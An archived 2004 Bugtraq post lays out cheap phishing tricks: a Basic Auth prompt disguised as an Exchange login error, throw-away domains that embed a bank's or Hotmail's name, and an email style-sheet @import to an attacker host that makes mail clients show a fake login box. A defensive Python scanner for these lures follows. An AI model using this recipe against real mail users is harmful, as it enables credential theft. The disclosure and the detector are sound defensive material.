
Stupid Phishing Tricks

daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Fri May 21 16:34:01 2004

Message-Id: <200405211346.i4LDkl3W022607@web125.megawebservers.com>
To: <bugtraq@securityfocus.com>
Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@excite.com" <1@malware.com>
Cc: <NTBugtraq@listserv.ntbugtraq.com>
Reply-To: 1@malware.com



Phriday, May 21, 2004

Several pheeble yet interesting phishing possibilities arise as 
phollows:

Take one .htaccess trivially modified to suit the target 
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style sheet' works on outbound [reply to] [so 
much for not downloading external content]; inbound can be 
achieved as well via http://securityfocus.com/bid/10369, which 
has an even more convincing network login applet.

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint: hotmail [and other] web designer people; off-set the html 
login form on the site as many prime banks have done.

The possibilities are obviously endless.


BE AWARE OF THE SHARKS OUT THERE


NB: anyone have any contact or connection to the upper 
management security or abuse dept. of one public company called 
SAVVIS Communications (http://savvis.net/)? It appears their abuse 
dept. is woefully negligent in attending to abuse affairs.


End Call

-- 
http://www.malware.com
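Two of the ingredients in the post above (a throw-away domain carrying the target's host name as a subdomain label, and a style sheet `@import` that makes the mail client fetch external content while rendering) can both be checked for on the receiving side, before a user ever sees the login prompt. The following Python is an added example by the editor, not code from http-equiv's post or from any mail client vendor: it parses an HTML mail body, lists the style-sheet URLs the client would fetch, and flags any URL whose host puts a watched brand name under an unrelated registered domain. The brand watch list, the legitimate-domain list, the `example.net` hosts and both sample messages are constructed for the example, and the registered-domain split is a naive last-two-labels heuristic rather than a public-suffix lookup.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed watch list: brand names that should not appear as subdomain
# labels of an unrelated registered domain (hypothetical values).
WATCHED_BRANDS = {"hotmail", "evenlargerbank", "bloatedcorp"}
# Constructed list of registered domains those brands legitimately use.
LEGIT_DOMAINS = {"hotmail.com", "evenlargerbank.com", "bloatedcorp.com"}


def registered_domain(host):
    """Naive registered-domain split: the last two labels of the host.
    Real deployments should consult a public-suffix list (e.g. co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def brand_in_subdomain(host):
    """Return watched brand names found in the subdomain labels of host when
    the registered domain is not one the brand legitimately owns."""
    host = host.lower().rstrip(".")
    if registered_domain(host) in LEGIT_DOMAINS:
        return set()
    sub_labels = host.split(".")[:-2]
    return {b for b in WATCHED_BRANDS if any(b in lbl for lbl in sub_labels)}


class MailHtmlCollector(HTMLParser):
    """Collect <style> text, <link rel=stylesheet> hrefs and <a> hrefs."""

    def __init__(self):
        super().__init__()
        self.in_style = False
        self.style_text = []
        self.link_hrefs = []
        self.anchor_hrefs = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":
            self.in_style = True
        elif tag == "link" and a.get("rel", "").lower() == "stylesheet" and a.get("href"):
            self.link_hrefs.append(a["href"])
        elif tag == "a" and a.get("href"):
            self.anchor_hrefs.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style:
            self.style_text.append(data)


# Matches "@import url( http://... )" as well as "@import 'http://...'" forms.
IMPORT_RE = re.compile(r"""@import\s+(?:url\(\s*)?['"]?([^'")\s;]+)""", re.IGNORECASE)


def _parse(html):
    p = MailHtmlCollector()
    p.feed(html)
    p.close()
    return p


def external_style_urls(html):
    """Style-sheet URLs the client would fetch over HTTP(S) when rendering."""
    p = _parse(html)
    candidates = IMPORT_RE.findall("".join(p.style_text)) + p.link_hrefs
    return [u for u in candidates if urlparse(u).scheme in ("http", "https")]


def scan_email_html(html):
    """Return a list of (url, [reasons]) findings for one HTML mail body."""
    findings = []
    for url in external_style_urls(html):
        host = urlparse(url).hostname or ""
        reasons = ["external style sheet fetched on render"]
        spoofed = brand_in_subdomain(host)
        if spoofed:
            reasons.append("brand name in subdomain: " + ", ".join(sorted(spoofed)))
        findings.append((url, reasons))
    for url in _parse(html).anchor_hrefs:
        host = urlparse(url).hostname or ""
        spoofed = brand_in_subdomain(host)
        if spoofed:
            findings.append((url, ["link host spoofs brand: " + ", ".join(sorted(spoofed))]))
    return findings


# Constructed sample message mirroring the style-sheet trick in the post.
SAMPLE_EMAIL_HTML = """<html><head>
<STYLE type=text/css>
@import url( http://www.hotmail.hackerguy.example.net/pheesh );
</STYLE></head>
<body>Your session expired. <a href="http://www.hotmail.hackerguy.example.net/login">Sign in again</a></body></html>"""

# Constructed benign message: inline style only, link to the brand's own domain.
BENIGN_EMAIL_HTML = """<html><head><style>body{font-family:sans-serif}</style></head>
<body><a href="https://login.hotmail.com/">Sign in</a></body></html>"""

if __name__ == "__main__":
    for url, reasons in scan_email_html(SAMPLE_EMAIL_HTML):
        print(url, "->", "; ".join(reasons))
    print("benign findings:", scan_email_html(BENIGN_EMAIL_HTML))
```

The scan deliberately treats any external style sheet as a finding on its own, independent of the host check: the post's point is that the client fetches the sheet even with external content "blocked", so a gateway that strips or rewrites `@import` and `<link rel=stylesheet>` removes the lure regardless of which domain it points at. The brand-in-subdomain check is the cheap complement for the throw-away-domain trick and is only as good as the watch list and the registered-domain split behind it.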
